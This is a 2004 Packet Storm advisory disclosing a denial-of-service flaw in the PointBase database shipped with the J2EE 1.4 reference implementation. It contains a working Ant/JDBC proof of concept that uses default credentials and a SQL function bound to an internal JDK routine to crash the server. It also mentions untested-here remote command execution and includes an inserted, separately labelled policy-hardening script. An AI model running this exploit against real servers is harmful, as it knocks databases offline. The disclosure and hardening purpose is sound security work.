j2ee.pointbase.txt

2004-01-19T00:00:00
ID PACKETSTORM:32527
Type packetstorm
Reporter Marc Schoenefeld
Modified 2004-01-19T00:00:00

Description

                                        
                                            `Hi,  
  
the following code crashes the Pointbase 4.6 database that comes with the
J2EE reference implementation. It is provided as an ant script for
flexibility and to illustrate the involved resources.
  
This is a cross-platform denial-of-service Java exploit, caused by the fact that
the pointbase installation coming with the J2EE RI 1.4 is not equipped with an
appropriate security manager, thus implicitly giving all jars all
permissions. These unlimited permissions can be exploited by an attacker
using JDBC to crash the JVM running the pointbase server.
  
Unfortunately there is no policy file provided by Sun defining the necessary
permissions for pointbase, leaving the application server deployer alone in
the rain. And figuring out the permissions when starting from a
zero-permissions policy file is a long, time-consuming job.
  
A recommended approach to find out the permissions an application needs for
a given use case is test-driving the application with jchains
(www.jchains.org) and using this tool to record the needed permissions in a
permission template. After fine-tuning the recorded permissions and starting
the application with a security manager configured with these permissions,
the application runs in a confined "sandbox" mode, which prevents attackers
from accessing vulnerable JDK routines like sun.misc.MessageUtils.toStderr.
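The confinement step described above, as an added example that is not Sun's, PointBase's or the advisory author's code: a least-privilege policy file for the database server's own jars plus the JVM flags that install a security manager and make that file the only policy in force. The grants listed are a constructed starting point and the install layout, the server main class and the property name pointbase.home are assumptions; the real permission set has to come from recording the application's needs (for example with jchains) as the advisory describes.

```shell
#!/bin/sh
# Added example (not Sun's, PointBase's or the advisory author's code).
# Writes a least-privilege Java policy for a JDBC server's jars and prints
# the launch command that enforces it. Every grant below is a constructed
# starting point to be replaced by the recorded set; the install layout
# (lib/, databases/) and the server main class are assumptions/placeholders.

# The policy parser expands ${pointbase.home} and ${/} itself, so the heredoc
# is quoted to keep the shell from touching those references.
write_pointbase_policy() {
  policy="$1"
  cat > "$policy" <<'EOF'
// Constructed least-privilege template for the PointBase server jars.
// Deliberately no grant for RuntimePermission "accessClassInPackage.sun.misc":
// with a security manager installed, the JDK only lets code load classes
// from sun.* packages (the route the advisory's CRASH5 function takes)
// when that permission has been granted to it.
grant codeBase "file:${pointbase.home}${/}lib${/}-" {
  // listen on the JDBC port; accept client connections from ephemeral ports
  permission java.net.SocketPermission "localhost:9092", "listen,resolve";
  permission java.net.SocketPermission "*:1024-", "accept,resolve";
  // database files under the install directory (assumed layout)
  permission java.io.FilePermission "${pointbase.home}${/}databases${/}-", "read,write,delete";
  permission java.io.FilePermission "${pointbase.home}${/}lib${/}-", "read";
  permission java.util.PropertyPermission "*", "read";
};
EOF
}

# -Djava.security.manager installs the manager; "policy==" (double equals)
# makes this file the ONLY policy, i.e. the zero-permissions baseline the
# advisory mentions plus the grants above. The main class is a placeholder:
# take the real one from the start script shipped with the RI.
pointbase_start_cmd() {
  policy="$1"
  home="$2"
  printf 'java -Djava.security.manager -Djava.security.policy==%s -Dpointbase.home=%s -cp %s/lib/pbserver.jar POINTBASE_SERVER_MAIN_CLASS_PLACEHOLDER\n' \
    "$policy" "$home" "$home"
}

# Usage: write the policy to a temp location and show the launch line.
POLICY_FILE="${TMPDIR:-/tmp}/pointbase.policy"
write_pointbase_policy "$POLICY_FILE"
pointbase_start_cmd "$POLICY_FILE" /opt/pointbase
```

Start from this file, run the recorded use cases against the server, and add only the permissions the security manager actually reports as denied; anything the server does not need stays out of the policy.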
  
Further possible exploitations are information disclosure and remote command
injection (tested on java/winxp and java/linux, where I was able to start
notepad.exe (win) or xemacs (linux) on the pointbase server via a jdbc
command). Further details on these vulnerabilities and which major JDBC
databases are vulnerable (it is not only pointbase having this bug; you may
remember the jboss vulnerability in 9/2003) can be read in an upcoming
report by illegalaccess.org.
  
If you are interested in more details you can contact me
(marc[at]marc-schoenefeld.com). Also send me an email to get a policy file
tailored to the pointbase installation of j2ee14ri. Also feel free to
download the jChains tool and send me your suggestions and further thoughts
about it. jChains is free to use for educational purposes only, so you need
to ask me about restrictions for any commercial usage.
  
Cheers  
Marc Schoenefeld (marc[at]illegalaccess.org)  
  
======================build.xml=======================  
  
<!-- pointbase denial-of-service by marc schoenefeld -->

<project default="dos">

  <property name="host" value="192.168.0.7"/>

  <target name="dos">
    <sql
      driver="com.pointbase.jdbc.jdbcUniversalDriver"
      url="jdbc:pointbase://${host}:9092/sample"
      userid="pbpublic"
      password="pbpublic"
      print="true"
    >
    <![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
    ]]>
      <classpath>
        <pathelement location="pbclient.jar"/>
      </classpath>
    </sql>
  </target>

</project>
  
  
======================build.xml=======================  
  
--  
  
Never be afraid to try something new. Remember, amateurs built the  
ark; professionals built the Titanic. -- Anonymous  
  
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer  